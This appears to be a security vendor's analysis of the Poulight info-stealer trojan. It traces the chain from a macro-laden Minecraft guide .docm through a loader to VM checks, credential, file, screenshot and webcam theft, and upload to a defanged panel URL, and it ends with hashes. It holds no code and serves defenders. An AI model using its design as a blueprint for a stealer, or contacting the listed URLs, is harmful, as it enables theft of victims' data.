Poulight is an info-stealer trojan which most probably originated in Russia. It is written in the .NET and can collect sensitive information and deliver it to cybercriminals. Ever since its first appearance, it has been growing substantially and taking different forms. The main Infection vector remains spear-phishing emails. It was sold in just a handful of dollars so that it was easily accessible to cybercriminals. Their website ‘poullight[.]ru’ called it ‘Poulight Stealer’ and boasted it as the best product on the internet.
It begins with a doc file named “Minecraft how to play guide.docm”, which is a Microsoft word file. This file contains an image of the Minecraft game along with some abusive Russian text.
This doc file contains macro, which is executed automatically if macros are enabled. The macro is simple and uses cmd.exe to further execute a PowerShell command to download an additional executable. This executable is saved as mess.exe and executed.
The ‘mess.exe’ is a loader for Poulight. It carries two more executable stored in ‘RCDATA’ resources. The names A1 and A2 in RCDATA contain .exe files and B1 and B2 contain the respective names of those executables.
The ‘mess.exe’, upon execution, drops the executables present in RCDATA to the %tmp% folder and executes them using ‘ShellExecuteA’.
The two dropped executables into the %tmp% folder are ‘fakerror.exe’ and ‘injector (automatic).exe’.
Here is the complete process flow of Poulight Stealer.
The fakerror.exe is a .NET executable and does exactly as the name implies. Its sole purpose is to fake an error message.
The fake message is in the Turkish language, as shown in the above figure. Relying on google translate, the message means ‘The Program cannot be started. VM or Windows under update 10 detected’.
However, It is trying to disguise as if executable did not run when the other executable (‘injector(automatic).exe’) was running successfully.
The next executable ‘injector(automatic).exe’ is the actual Poulight Stealer. When injector(automatic).exe is run on the target system, one of the first things it does is to check whether it is running on an actual computer or a virtual machine. If a virtual machine activity is detected, the malware is terminated.
The above function uses classic Windows Management Instrumentation (WMI) through the execution of the query “Select * from Win32_ComputerSystem”.
The following are the few checks that are used to detect Virtual Environment and Sandboxing.
Then the malware creates two random folders in ‘C:\Users\<user>\AppData\Local\<random-8-letters>’ which are used later. Also, the path of folders like Desktop, AppData, Local AppData, and Documents is stored in class variables.
Then the configuration and parameters are read from the resources. Below is the code responsible for the reading of configuration and parameters. Parameters are store in an array for further use.
Below is the figure of decoded configuration and parameters.
A check for the presence of a file in %tmp% directory is performed which indicates the pre-existence of the malware. This file is used as a mutex to prevent the re-infection of the same system on which it is already present. Subsequently, the prime function responsible for all information gathering and exfiltration is called. This function is named ‘Start’ which is present in the ‘xs’ class. The very first function inside this ‘Start’ is ‘Information.AVDetect()’ which is used for as name suggest, detecting any AV product installed. The system information is extracted from the registry. This information includes Username, Machinename, and Processor and Video Controller which can be used for the identification of virtual machines.
This gathered information is stored in one of the two folders generated in Local AppData in a file named ‘PC-Information.txt’. A list of all running processes is also stored in the same directory in a file named ‘ProcessList.txt’.
After gathering of system info, now it starts stealing of sensitive data from various programs actively. Below is the list of capabilities of malware to steal data from infected systems.
The DesktopImg.Start() function takes a screenshot of active desktop on system. Webcam.start() captures a webcam picture.
The DFiles class is interesting as it carries the extension list of sensitive documents to steal data.
Files collected having these extensions are searched for common words for storing credentials like password and login.
The search() function hunts all browsers and there login data paths using string_0() and BrowList2() functions.
All the scraped information is stored inside of the previous Local AppData directory. Below is the massive amount of sensitive data that the stealer has captured.
All this information is zipped together in a new file in the AppData roaming directory.
This zip file along with the other collected information is stored in a unique data structure.
This collected data is then uploaded to URL ‘https://f0429164[.]xsph.run/Panel/gate.php’.
After successful uploading of data, there is a provision to download an additional payload from the below URL ‘https://ru-uid-507352920[.]pp.ru/example.exe’. It can also be used for the self-update.
Quick Heal detects all the malicious components of this malware. The main ‘injector(automatic).exe’ i.e poulight.exe detected as “Trojan.Stealer.S12567177”.
Filename: minecraft how to play guide.docm MD5: 7FBC52BB2BCE064A51D671C8CA20FB1E
Filename: injector(automatic).exe (Poulight.exe) MD5: 8E855BCB97E9D1DCB2C79C580DCA7F2D
Filename: Mess.exe (ET3.exe) MD5: 58386adaea3b5e737144388e6607d8a5
Filename: fakerror.exe MD5: 3F4BC3D0287D911603691767C5D372FA